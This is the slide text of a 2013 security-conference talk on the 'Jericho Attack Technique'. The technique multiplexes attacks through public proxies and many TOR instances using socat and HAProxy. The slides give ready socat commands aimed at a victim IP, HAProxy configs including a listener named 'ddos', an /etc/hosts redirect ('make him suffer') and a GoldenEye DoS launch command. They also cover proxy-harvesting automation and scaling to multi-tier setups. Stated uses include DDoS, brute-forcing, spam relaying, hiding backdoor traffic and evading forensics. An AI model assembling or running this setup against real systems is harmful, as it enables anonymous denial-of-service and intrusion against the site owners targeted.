Jericho Attack Technique

3,356 views
3,255 views

Published on

This is my presentation held at Vale Security Conference on September 14th 2013 about multiplexing attacks through TOR exit-nodes and SOCKS/HTTPs proxies

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,356
On SlideShare
0
From Embeds
0
Number of Embeds
22
Actions
Shares
0
Downloads
45
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

Jericho Attack Technique

  1. 1. Jericho Attack TechniqueJericho Attack Technique Cluster-bombing TCP attacks for maximum impactCluster-bombing TCP attacks for maximum impact Jan SeidlJan Seidl jseidl@wroot.orgjseidl@wroot.org @jseidl@jseidl
  2. 2. $ whoami$ whoami AboutAbout Full Name: Jan SeidlFull Name: Jan Seidl Origin: Rio de Janeiro, RJ – BrazilOrigin: Rio de Janeiro, RJ – Brazil Work:Work: ● CTO @ TI SafeCTO @ TI Safe ● OpenSource contributor for: PEV, LogstashOpenSource contributor for: PEV, Logstash ● Codes and snippets @ github.com/jseidlCodes and snippets @ github.com/jseidl Features:Features: ● UNIX Evangelist/Addict/Freak (but no fanboy!)UNIX Evangelist/Addict/Freak (but no fanboy!) ● Python and C loverPython and C lover ● Coffee dependentCoffee dependent ● Hates printers and social networksHates printers and social networks ● Proud DC Labs ResearcherProud DC Labs Researcher Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil
  3. 3. $ whoami$ whoami Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil
  4. 4. $ whoami$ whoami Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil STUPID, BROKE, NERD, BROKESTUPID, BROKE, NERD, BROKE
  5. 5. DisclaimerDisclaimer ‘‘Jericho’ is a product from the fictional company ‘StarkJericho’ is a product from the fictional company ‘Stark Industries’ from “The Iron Man” movie franchise fromIndustries’ from “The Iron Man” movie franchise from Paramount Pictures and Marvel Studios, as well as anyParamount Pictures and Marvel Studios, as well as any related picture presented in this presentation.related picture presented in this presentation. Please do not sue me.Please do not sue me. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil
  6. 6. x00 Overviewx00 Overview x01 Application / Usesx01 Application / Uses x02 Required Partsx02 Required Parts x03 Weapon Assemblyx03 Weapon Assembly x04 Weapon Tuningx04 Weapon Tuning x05 Launching the attackx05 Launching the attack x06 Weapon Maintenancex06 Weapon Maintenance x07 Escalating Firepowerx07 Escalating Firepower x08 Turning into a Smart Weaponx08 Turning into a Smart Weapon x09 Demo!x09 Demo! Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil AgendaAgenda
  7. 7. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil OverviewOverview The attack consists on utilizingThe attack consists on utilizing public SOCKS proxiespublic SOCKS proxies andand TOR instancesTOR instances throughthrough socket multiplexingsocket multiplexing softwaresoftware (e.g.: Load Balancing/Cluster software) as(e.g.: Load Balancing/Cluster software) as relays for attacks in a load-balancing fashionrelays for attacks in a load-balancing fashion At a glance
  8. 8. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil OverviewOverview public SOCKS proxies + TOR instances + socketpublic SOCKS proxies + TOR instances + socket multiplexing softwaremultiplexing software At a glance
  9. 9. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil OverviewOverview At a glance
  10. 10. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil OverviewOverview Schematics Attacker Proxy 1 Proxy 2 Proxy 3 Proxy 4 Proxy 5 Proxy 6 Proxy 7 VictimHAProxy
  11. 11. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil OverviewOverview Evading connection and rate limitingEvading connection and rate limiting Bypassing country/origin restrictionsBypassing country/origin restrictions Hiding origin of attacks, making forensics people sad :(Hiding origin of attacks, making forensics people sad :( Low bandwidth attack such as Layer 7 DOS attacksLow bandwidth attack such as Layer 7 DOS attacks Very efficient for Ataques DoS Super Eficientes: Layer 7, Android, load balancing e Tor (pt_BR)Ataques DoS Super Eficientes: Layer 7, Android, load balancing e Tor (pt_BR) http://slidesha.re/14yYiuVhttp://slidesha.re/14yYiuV
  12. 12. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil OverviewOverview At first HAProxy may seem as a load balancer strictlyAt first HAProxy may seem as a load balancer strictly for HTTP(S), but it’s not.for HTTP(S), but it’s not. HAProxy’s actual description is “The Reliable, HighHAProxy’s actual description is “The Reliable, High PerformancePerformance TCPTCP/HTTP Load Balancer”./HTTP Load Balancer”. Cool, huh?Cool, huh? Paying closer attention
  13. 13. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil UsesUses Applications for the Jericho Attack Technique
  14. 14. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil UsesUses Web scraping/spideringWeb scraping/spidering Limited API requestsLimited API requests IP-based anti-fraud schemes (eg: Online Voting)IP-based anti-fraud schemes (eg: Online Voting) User enumerationUser enumeration Password brute-forcingPassword brute-forcing Basic multiplexing use
  15. 15. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil UsesUses Making Layer 7 Denial-of-Service attacks intoMaking Layer 7 Denial-of-Service attacks into distributed configuration (DoS → DdoS)distributed configuration (DoS → DdoS) (I like this one very much in particular)(I like this one very much in particular) Hitting hard
  16. 16. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil UsesUses Multiplexing mail relays for SPAMMultiplexing mail relays for SPAM Multiplexing and anonymizing backdoor connections /Multiplexing and anonymizing backdoor connections / commandscommands Even more? Go crazy!Even more? Go crazy! Going deeper
  17. 17. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil UsesUses FTPFTP SMTP(S) POP3(S) IMAP(S)SMTP(S) POP3(S) IMAP(S) SSHSSH RDP / VNCRDP / VNC MySQLMySQL many more...many more... Possibly supported protocols
  18. 18. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts Building the weapon
  19. 19. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts Main assembly Socat: Multipurpose RelaySocat: Multipurpose Relay http://www.dest-unreach.org/socat/http://www.dest-unreach.org/socat/ SSL support:SSL support: HTTPS, IMAPS, POPS, LDAPSHTTPS, IMAPS, POPS, LDAPS
  20. 20. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts Main assembly HAProxyHAProxy http://haproxy.1wt.eu/http://haproxy.1wt.eu/ ““The Reliable, High Performance TCP/HTTP LoadThe Reliable, High Performance TCP/HTTP Load Balancer”Balancer” REQUEST → HAPROXY → { SERVER A, SERVER B,REQUEST → HAPROXY → { SERVER A, SERVER B, SERVER C }SERVER C }
  21. 21. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts Resources SOCKS/HTTP(S) ProxiesSOCKS/HTTP(S) Proxies http://www.proxynova.com/proxy-server-list/http://www.proxynova.com/proxy-server-list/ http://hidemyass.com/proxy-list/http://hidemyass.com/proxy-list/ Just google it...Just google it...
  22. 22. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts Resources TOR exit nodesTOR exit nodes PRO TIP: You can run as many TOR tunnels as you want (:PRO TIP: You can run as many TOR tunnels as you want (: tor --RunAsDaemon 1 --CookieAuthentication 0tor --RunAsDaemon 1 --CookieAuthentication 0 --HashedControlPassword "pwd" --ControlPort 4444 --PidFile--HashedControlPassword "pwd" --ControlPort 4444 --PidFile torN.pid --SocksPort 9050 --DataDirectory data/torNtorN.pid --SocksPort 9050 --DataDirectory data/torN Multi-TORMulti-TOR https://github.com/jseidl/Multi-TOR/https://github.com/jseidl/Multi-TOR/ EX: ./multi-tor.sh 5 # Opens 5 TOR instancesEX: ./multi-tor.sh 5 # Opens 5 TOR instances
  23. 23. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts Important Note The proxies may or may not require authentication since socatThe proxies may or may not require authentication since socat supports proxy authentication adding the parameter as follows:supports proxy authentication adding the parameter as follows: proxyauth=user:passproxyauth=user:pass
  24. 24. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts Important Note Some public proxies append additional headers like X-Forwarded-For thatSome public proxies append additional headers like X-Forwarded-For that may ruin the whole purpose of utilizing a Jericho attack perspective.may ruin the whole purpose of utilizing a Jericho attack perspective. (Thanks for Lucas Fernando Amorim for remembering that!)(Thanks for Lucas Fernando Amorim for remembering that!)
  25. 25. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts Important Note For TOR, one can useFor TOR, one can use two-hop circuits for maximumtwo-hop circuits for maximum performance and degraded anonymityperformance and degraded anonymity oror greater-hopgreater-hop circuits for greater anonymity and degraded performancecircuits for greater anonymity and degraded performance.. It just depends on the use.It just depends on the use. Tor: Four Hops instead of ThreeTor: Four Hops instead of Three http://coldwaterq.com/?11http://coldwaterq.com/?11 TOR Auto-circuitTOR Auto-circuit https://thesprawl.org/projects/tor-autocircuit/https://thesprawl.org/projects/tor-autocircuit/ TOR control protocolTOR control protocol https://thesprawl.org/research/tor-control-protocol/https://thesprawl.org/research/tor-control-protocol/
  26. 26. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts (not so) Important Note I’ve developed a python tool named (albeit not very creatively)I’ve developed a python tool named (albeit not very creatively) proxygetproxyget.. BeautifulSoup + Mechanize = Smart Scraping!BeautifulSoup + Mechanize = Smart Scraping! Scripting → HAProxy.conf auto-generation for a Jericho attackScripting → HAProxy.conf auto-generation for a Jericho attack This tool is yet to be released. Stay tuned!This tool is yet to be released. Stay tuned!
  27. 27. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon AssemblyWeapon Assembly Sticking the parts together Easy simple steps:Easy simple steps: 1. Create lots of socat bindings to the victim, each from a1. Create lots of socat bindings to the victim, each from a different resource (proxy or TOR instance)different resource (proxy or TOR instance) 2. Configure the locally bound socat ports in HAProxy2. Configure the locally bound socat ports in HAProxy 3. Point victim's DNS name to localhost on /etc/hosts3. Point victim's DNS name to localhost on /etc/hosts 4. Fire at will4. Fire at will
  28. 28. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon AssemblyWeapon Assembly Sticking the parts together: socat with proxies # socat TCP4-LISTEN:80# socat TCP4-LISTEN:80 PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT> # socat TCP4-LISTEN:8081# socat TCP4-LISTEN:8081 PROXY:190.221.25.225:93.184.216.119:80,proxyport=8080PROXY:190.221.25.225:93.184.216.119:80,proxyport=8080 Example:Example:
  29. 29. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon AssemblyWeapon Assembly Sticking the parts together: socat with TOR # socat TCP4­LISTEN:80,fork# socat TCP4­LISTEN:80,fork SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9050SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9050 # socat TCP4-LISTEN:8081# socat TCP4-LISTEN:8081 SOCKS4A:localhost:93.184.216.119:80,socksport=9050SOCKS4A:localhost:93.184.216.119:80,socksport=9050 Example:Example:
  30. 30. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon AssemblyWeapon Assembly Sticking the parts together: HAProxy listen ddos 0.0.0.0:80listen ddos 0.0.0.0:80 mode tcpmode tcp balancebalance roundrobinroundrobin serverserver inst1 localhost:8080inst1 localhost:8080 serverserver inst2 localhost:8081inst2 localhost:8081 serverserver inst3 localhost:8082inst3 localhost:8082 serverserver inst4 localhost:8083inst4 localhost:8083
  31. 31. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon AssemblyWeapon Assembly Sticking the parts together: HAProxy (larger sample) globalglobal maxconn 10000maxconn 10000 # set this accordingly to MAX within your kernel socket limits# set this accordingly to MAX within your kernel socket limits user haproxyuser haproxy group haproxygroup haproxy daemondaemon defaultsdefaults mode tcpmode tcp retries 3retries 3 option redispatchoption redispatch maxconn 20000maxconn 20000 # set accordingly# set accordingly contimeout 5000contimeout 5000 # set accordingly# set accordingly clitimeout 50000clitimeout 50000 # set accordingly# set accordingly srvtimeout 50000srvtimeout 50000 # set accordingly# set accordingly # Below we are configuring our socket list. You may mix TOR sockets with SOCKS-proxied# Below we are configuring our socket list. You may mix TOR sockets with SOCKS-proxied sockets.sockets. listen jericho 0.0.0.0:80listen jericho 0.0.0.0:80 # just a instance name# just a instance name mode tcpmode tcp balance roundrobinbalance roundrobin # gives more time within socket/outoging IP reuse# gives more time within socket/outoging IP reuse server inst1 localhost:8080server inst1 localhost:8080 # SOCKS proxy# SOCKS proxy server inst2 localhost:9051server inst2 localhost:9051 # TOR instance# TOR instance server inst3 localhost:9052server inst3 localhost:9052 # TOR instance# TOR instance
  32. 32. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon AssemblyWeapon Assembly Sticking the parts together: /etc/hosts # Jericho target below this line# Jericho target below this line # make him suffer (:# make him suffer (: example.com, www.example.comexample.com, www.example.com 127.0.0.1127.0.0.1
  33. 33. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon AssemblyWeapon Assembly Ta-da!
  34. 34. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon TuningWeapon Tuning Moar firepower!Moar firepower!
  35. 35. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon TuningWeapon Tuning About performanceAbout performance There are several parameters on the linux kernel that can beThere are several parameters on the linux kernel that can be tuned in order to achieve better TCP performance.tuned in order to achieve better TCP performance. Because ‘performance’ is relative to the attack being conductedBecause ‘performance’ is relative to the attack being conducted (you may need more bandwidth or more concurrent connections(you may need more bandwidth or more concurrent connections or anything else), there are several options that one mustor anything else), there are several options that one must consider.consider.
  36. 36. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon TuningWeapon Tuning Linux Tuning ResourcesLinux Tuning Resources TCP Performance Tuning | SoftpanoramaTCP Performance Tuning | Softpanorama http://bit.ly/17RiLWvhttp://bit.ly/17RiLWv Linux Tweaking | Speedguide.netLinux Tweaking | Speedguide.net http://bit.ly/18JDnlLhttp://bit.ly/18JDnlL Improving TCP performance over a gigabit network with lots ofImproving TCP performance over a gigabit network with lots of connections and high traffic of small packets | ServerFaultconnections and high traffic of small packets | ServerFault http://bit.ly/1fRyjhZhttp://bit.ly/1fRyjhZ Linux TCP/IP Tuning | LognormalLinux TCP/IP Tuning | Lognormal http://bit.ly/17Rj8QNhttp://bit.ly/17Rj8QN
  37. 37. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Launching the attackLaunching the attack
  38. 38. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Launching the attackLaunching the attack Check that everything is workingCheck that everything is working You may want to socat resources first to an IP testing website toYou may want to socat resources first to an IP testing website to verify that Jericho is working successfullyverify that Jericho is working successfully Then rebind sockets to final destination (victim)Then rebind sockets to final destination (victim) (don't forget the /etc/hosts entry!)(don't forget the /etc/hosts entry!)
  39. 39. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Launching the attackLaunching the attack Fire in the hole!Fire in the hole! # ./goldeneye.py http://www.example.com/index.php -t# ./goldeneye.py http://www.example.com/index.php -t 1000 -m get1000 -m get Ahhh... easy and transparent!Ahhh... easy and transparent!
  40. 40. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Launching the attackLaunching the attack Fire in the hole!Fire in the hole!
  41. 41. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon MaintenanceWeapon Maintenance
  42. 42. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon MaintenanceWeapon Maintenance Check if your exit proxies are still working and not blockedCheck if your exit proxies are still working and not blocked Check if your TOR identities aren't blockedCheck if your TOR identities aren't blocked Gather new proxies and reconfigureGather new proxies and reconfigure Renew TOR identities (tor_newid.sh, part of Multi-TOR)Renew TOR identities (tor_newid.sh, part of Multi-TOR) Keeping the blade sharpKeeping the blade sharp
  43. 43. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon MaintenanceWeapon Maintenance Watchdog daemons / scriptsWatchdog daemons / scripts Cron jobsCron jobs Manual checkingManual checking Keeping the blade sharpKeeping the blade sharp
  44. 44. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Escalating FirepowerEscalating Firepower Multiple Jericho setups on many hostsMultiple Jericho setups on many hosts ++ Intermediary Forwarder/Multiplexer Jericho node(s)Intermediary Forwarder/Multiplexer Jericho node(s) ++ Multiple or single attack sourcesMultiple or single attack sources Large-size clustered attack environmentsLarge-size clustered attack environments
  45. 45. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Escalating FirepowerEscalating Firepower Single-tier cascading Jericho architechtureSingle-tier cascading Jericho architechture
  46. 46. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Escalating FirepowerEscalating Firepower Multi-tier cascading Jericho architechtureMulti-tier cascading Jericho architechture
  47. 47. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Escalating FirepowerEscalating Firepower
  48. 48. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Turning into a smart weaponTurning into a smart weapon
  49. 49. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Turning into a smart weaponTurning into a smart weapon Initialization SequenceInitialization Sequence Define Resources multi-tor.sh proxyget.py IP PORT list TOR socket list joinlists.sh jericho.res
  50. 50. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Turning into a smart weaponTurning into a smart weapon Automatic testingAutomatic testing testresources.shjericho.res all resources valid? proceed gather and revalidate resources
  51. 51. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Turning into a smart weaponTurning into a smart weapon Self-configurationSelf-configuration initjericho.sh list2socat.sh list2haproxycfg.sh haproxy.cfg jericho.res reload haproxy
  52. 52. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Turning into a smart weaponTurning into a smart weapon Full routineFull routine Initialize Configure Test Run
  53. 53. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Turning into a smart weaponTurning into a smart weapon Poor-man's smart JerichoPoor-man's smart Jericho # Gather proxy list ./proxyget.py --minanon high --minspd medium --type http --quantity 200 > /tmp/proxies # Parse list cut -f3,7 -d' ' /tmp/proxies > /tmp/parsedproxy # Spawn socat entries ./gensocat.sh 93.184.216.119 /tmp/parsedproxy # Reconfigure haproxy echo "$HAPROXYCONF_HEAD" > /tmp/haproxy ./genhaproxycfg.sh 200 >> /tmp/haproxy cp /etc/haproxy/haproxy.cfg /etc/haproxy/haproxy.cfg.old cp /tmp/haproxy /etc/haproxy/haproxy.cfg /etc/init.d/haproxy restart
  54. 54. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Turning into a smart weaponTurning into a smart weapon What else?What else? Web Interfaces?Web Interfaces? API?API? Cloud-hosted?Cloud-hosted? Quick-deploy packages?Quick-deploy packages? Jericho-as-a-Service (JaaS)?Jericho-as-a-Service (JaaS)?
  55. 55. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Demo (:Demo (: Jericho Attack Technique @ YouTubeJericho Attack Technique @ YouTube http://youtu.be/YRMyW2OA0gIhttp://youtu.be/YRMyW2OA0gI
  56. 56. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Questions?Questions?
  57. 57. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Thank you!Thank you! –– To peace!To peace! jseidl@wroot.org / @jseidl / http://wroot.org

×